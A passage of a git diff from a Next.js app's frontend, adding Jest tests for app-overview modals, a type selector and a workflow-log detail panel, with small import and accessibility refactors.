expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { 
...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) 
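// window.open is replaced with a jest.fn() via Object.defineProperty above, so the assertions inspect the stub instead of triggering real navigation.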
+ + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = 
screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/overview/embedded/index.tsx b/web/app/components/app/overview/embedded/index.tsx index 6eba993e1d..d4be58b1b2 100644 --- a/web/app/components/app/overview/embedded/index.tsx +++ b/web/app/components/app/overview/embedded/index.tsx @@ -14,7 +14,7 @@ import type { SiteInfo } from '@/models/share' import { useThemeContext } from '@/app/components/base/chat/embedded-chatbot/theme/theme-context' import ActionButton from '@/app/components/base/action-button' import { basePath } from '@/utils/var' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { siteInfo?: SiteInfo diff --git a/web/app/components/app/overview/settings/index.tsx b/web/app/components/app/overview/settings/index.tsx index 3b71b8f75c..d079631cf7 100644 --- a/web/app/components/app/overview/settings/index.tsx +++ b/web/app/components/app/overview/settings/index.tsx @@ -25,7 +25,7 @@ import { useModalContext } from '@/context/modal-context' import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' import type { AppIconSelection } from '@/app/components/base/app-icon-picker' import AppIconPicker from '@/app/components/base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDocLink } from '@/context/i18n' export type ISettingsModalProps = { diff --git a/web/app/components/app/switch-app-modal/index.spec.tsx b/web/app/components/app/switch-app-modal/index.spec.tsx new file mode 100644 index 0000000000..b6fe838666 --- /dev/null +++ b/web/app/components/app/switch-app-modal/index.spec.tsx @@ -0,0 +1,295 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import SwitchAppModal from './index' +import { ToastContext } from '@/app/components/base/toast' +import type { App } from '@/types/app' +import { AppModeEnum } from '@/types/app' +import { Plan } from '@/app/components/billing/type' +import { NEED_REFRESH_APP_LIST_KEY } from '@/config' + +const mockPush = jest.fn() +const mockReplace = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + }), +})) + +const mockSetAppDetail = jest.fn() +jest.mock('@/app/components/app/store', () => ({ + useStore: (selector: (state: any) => unknown) => selector({ setAppDetail: mockSetAppDetail }), +})) + +const mockSwitchApp = jest.fn() +const mockDeleteApp = jest.fn() +jest.mock('@/service/apps', () => ({ + switchApp: (...args: unknown[]) => mockSwitchApp(...args), + deleteApp: (...args: unknown[]) => mockDeleteApp(...args), +})) + +let mockIsEditor = true +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: mockIsEditor, + userProfile: { + email: 'user@example.com', + 
}, + langGeniusVersionInfo: { + current_version: '1.0.0', + }, + }), +})) + +let mockEnableBilling = false +let mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, +} +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: mockPlan, + enableBilling: mockEnableBilling, + }), +})) + +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) =>
<div data-testid='apps-full'>AppsFull {loc}</div>
    , +})) + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'app-123', + name: 'Demo App', + description: 'Demo description', + author_name: 'Demo author', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: AppModeEnum.COMPLETION, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const renderComponent = (overrides: Partial> = {}) => { + const notify = jest.fn() + const onClose = jest.fn() + const onSuccess = jest.fn() + const appDetail = createMockApp() + + const utils = render( + + + , + ) + + return { + ...utils, + notify, + onClose, + onSuccess, + appDetail, + } +} + +describe('SwitchAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockIsEditor = true + mockEnableBilling = false + mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + } + }) + + // Rendering behavior for modal visibility and default values. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.switch')).toBeInTheDocument() + expect(screen.getByDisplayValue('Demo App(copy)')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.switch')).not.toBeInTheDocument() + }) + }) + + // Prop-driven UI states such as disabling actions. + describe('Props', () => { + it('should disable the start button when name is empty', async () => { + const user = userEvent.setup() + // Arrange + renderComponent() + + // Act + const nameInput = screen.getByDisplayValue('Demo App(copy)') + await user.clear(nameInput) + + // Assert + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + + it('should render the apps full warning when plan limits are reached', () => { + // Arrange + mockEnableBilling = true + mockPlan = { + ...mockPlan, + usage: { ...mockPlan.usage, buildApps: 10 }, + total: { ...mockPlan.total, buildApps: 10 }, + } + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + }) + + // User interactions that trigger navigation and API calls. 
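// (Navigation is verified through the mocked next/navigation router: push keeps the current history entry, replace swaps it.)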
+ describe('Interactions', () => { + it('should call onClose when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onClose } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'app.newApp.Cancel' })) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should switch app and navigate with push when keeping original', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail, notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-001' }) + const setItemSpy = jest.spyOn(Storage.prototype, 'setItem') + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockSwitchApp).toHaveBeenCalledWith({ + appID: appDetail.id, + name: 'Demo App(copy)', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + }) + expect(onSuccess).toHaveBeenCalledTimes(1) + expect(onClose).toHaveBeenCalledTimes(1) + expect(notify).toHaveBeenCalledWith({ type: 'success', message: 'app.newApp.appCreated' }) + expect(setItemSpy).toHaveBeenCalledWith(NEED_REFRESH_APP_LIST_KEY, '1') + expect(mockPush).toHaveBeenCalledWith('/app/new-app-001/workflow') + expect(mockReplace).not.toHaveBeenCalled() + }) + + it('should delete the original app and use replace when remove original is confirmed', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail } = renderComponent({ inAppDetail: true }) + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-002' }) + + // Act + await user.click(screen.getByText('app.removeOriginal')) + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockDeleteApp).toHaveBeenCalledWith(appDetail.id) + }) + expect(mockReplace).toHaveBeenCalledWith('/app/new-app-002/workflow') + expect(mockPush).not.toHaveBeenCalled() + expect(mockSetAppDetail).toHaveBeenCalledTimes(1) + }) + + it('should notify error when switch app fails', async () => { + const user = userEvent.setup() + // Arrange + const { notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockRejectedValueOnce(new Error('fail')) + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(notify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + expect(onClose).not.toHaveBeenCalled() + expect(onSuccess).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/switch-app-modal/index.tsx b/web/app/components/app/switch-app-modal/index.tsx index a7e1cea429..742212a44d 100644 --- a/web/app/components/app/switch-app-modal/index.tsx +++ b/web/app/components/app/switch-app-modal/index.tsx @@ -6,7 +6,7 @@ import { useContext } from 'use-context-selector' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/text-generate/item/index.tsx b/web/app/components/app/text-generate/item/index.tsx 
index 92d86351e0..d284ecd46e 100644 --- a/web/app/components/app/text-generate/item/index.tsx +++ b/web/app/components/app/text-generate/item/index.tsx @@ -30,7 +30,7 @@ import type { SiteInfo } from '@/models/share' import { useChatContext } from '@/app/components/base/chat/chat/context' import ActionButton, { ActionButtonState } from '@/app/components/base/action-button' import NewAudioButton from '@/app/components/base/new-audio-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const MAX_DEPTH = 3 diff --git a/web/app/components/app/text-generate/saved-items/index.tsx b/web/app/components/app/text-generate/saved-items/index.tsx index c22a4ca6c2..e6cf264cf2 100644 --- a/web/app/components/app/text-generate/saved-items/index.tsx +++ b/web/app/components/app/text-generate/saved-items/index.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import copy from 'copy-to-clipboard' import NoData from './no-data' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { SavedMessage } from '@/models/debug' import { Markdown } from '@/app/components/base/markdown' import Toast from '@/app/components/base/toast' diff --git a/web/app/components/app/type-selector/index.spec.tsx b/web/app/components/app/type-selector/index.spec.tsx new file mode 100644 index 0000000000..346c9d5716 --- /dev/null +++ b/web/app/components/app/type-selector/index.spec.tsx @@ -0,0 +1,144 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import AppTypeSelector, { AppTypeIcon, AppTypeLabel } from './index' +import { AppModeEnum } from '@/types/app' + +jest.mock('react-i18next') + +describe('AppTypeSelector', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers default rendering and the closed dropdown state. + describe('Rendering', () => { + it('should render "all types" trigger when no types selected', () => { + render() + + expect(screen.getByText('app.typeSelector.all')).toBeInTheDocument() + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) + + // Covers prop-driven trigger variants (empty, single, multiple). + describe('Props', () => { + it('should render selected type label and clear button when a single type is selected', () => { + render() + + expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + + it('should render icon-only trigger when multiple types are selected', () => { + render() + + expect(screen.queryByText('app.typeSelector.all')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.chatbot')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.workflow')).not.toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + }) + + // Covers opening/closing the dropdown and selection updates. 
+ describe('User interactions', () => { + it('should toggle option list when clicking the trigger', () => { + render() + + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.getByRole('tooltip')).toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + + it('should call onChange with added type when selecting an unselected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.WORKFLOW]) + }) + + it('should call onChange with removed type when selecting an already-selected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.workflow')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([]) + }) + + it('should call onChange with appended type when selecting an additional item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.chatbot')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.agent')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.CHAT, AppModeEnum.AGENT_CHAT]) + }) + + it('should clear selection without opening the dropdown when clicking clear button', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.clear' })) + + expect(onChange).toHaveBeenCalledWith([]) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) +}) + +describe('AppTypeLabel', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers label mapping for each supported app type. + it.each([ + [AppModeEnum.CHAT, 'app.typeSelector.chatbot'], + [AppModeEnum.AGENT_CHAT, 'app.typeSelector.agent'], + [AppModeEnum.COMPLETION, 'app.typeSelector.completion'], + [AppModeEnum.ADVANCED_CHAT, 'app.typeSelector.advanced'], + [AppModeEnum.WORKFLOW, 'app.typeSelector.workflow'], + ] as const)('should render label %s for type %s', (_type, expectedLabel) => { + render() + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render empty label for unknown type', () => { + const { container } = render() + expect(container.textContent).toBe('') + }) +}) + +describe('AppTypeIcon', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers icon rendering for each supported app type. + it.each([ + [AppModeEnum.CHAT], + [AppModeEnum.AGENT_CHAT], + [AppModeEnum.COMPLETION], + [AppModeEnum.ADVANCED_CHAT], + [AppModeEnum.WORKFLOW], + ] as const)('should render icon for type %s', (type) => { + const { container } = render() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. 
+ it('should render nothing for unknown type', () => { + const { container } = render() + expect(container.firstChild).toBeNull() + }) +}) diff --git a/web/app/components/app/type-selector/index.tsx b/web/app/components/app/type-selector/index.tsx index 0f6f050953..f213a89a94 100644 --- a/web/app/components/app/type-selector/index.tsx +++ b/web/app/components/app/type-selector/index.tsx @@ -2,7 +2,7 @@ import { useTranslation } from 'react-i18next' import React, { useState } from 'react' import { RiArrowDownSLine, RiCloseCircleFill, RiExchange2Fill, RiFilter3Line } from '@remixicon/react' import Checkbox from '../../base/checkbox' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, @@ -20,6 +20,7 @@ const allTypes: AppModeEnum[] = [AppModeEnum.WORKFLOW, AppModeEnum.ADVANCED_CHAT const AppTypeSelector = ({ value, onChange }: AppSelectorProps) => { const [open, setOpen] = useState(false) + const { t } = useTranslation() return ( { 'flex cursor-pointer items-center justify-between space-x-1 rounded-md px-2 hover:bg-state-base-hover', )}> - {value && value.length > 0 &&
<div onClick={(e) => { - e.stopPropagation() - onChange([]) - }}> - <RiCloseCircleFill /> - 
</div>} + {value && value.length > 0 && ( + <button type='button' aria-label={t('common.operation.clear')} onClick={(e) => { e.stopPropagation(); onChange([]) }}><RiCloseCircleFill /></button> + )}
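The refactored control above is what the type-selector spec leans on: a native `button` exposes the implicit role `button`, and its `aria-label` (the mocked `t()` returns raw keys, hence `'common.operation.clear'`) becomes the accessible name that `getByRole('button', { name: ... })` matches. A minimal sketch of the pattern, with a hypothetical `ClearTrigger` standing in for the real markup:

```typescript
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'

// Hypothetical stand-in for the refactored clear control; the real classNames
// and icon are omitted. The aria-label supplies the accessible name getByRole matches.
const ClearTrigger = ({ onClear }: { onClear: () => void }) => (
  <button
    type='button'
    aria-label='common.operation.clear'
    onClick={(e) => {
      e.stopPropagation() // keep the click from toggling the surrounding dropdown
      onClear()
    }}
  >
    ×
  </button>
)

it('is reachable by role and accessible name', async () => {
  const onClear = jest.fn()
  render(<ClearTrigger onClear={onClear} />)

  await userEvent.click(screen.getByRole('button', { name: 'common.operation.clear' }))

  expect(onClear).toHaveBeenCalledTimes(1)
})
```

A clickable `div`, by contrast, has no implicit role, which is why the old markup could only be reached through text or DOM queries.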
    diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
<div data-testid='workflow-run'> + <span data-testid='run-detail-url'>{runDetailUrl}</span> + <span data-testid='tracing-list-url'>{tracingListUrl}</span> + </div>
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
<div data-testid='workflow-context-provider'>{children}</div>
    + ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 
'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + 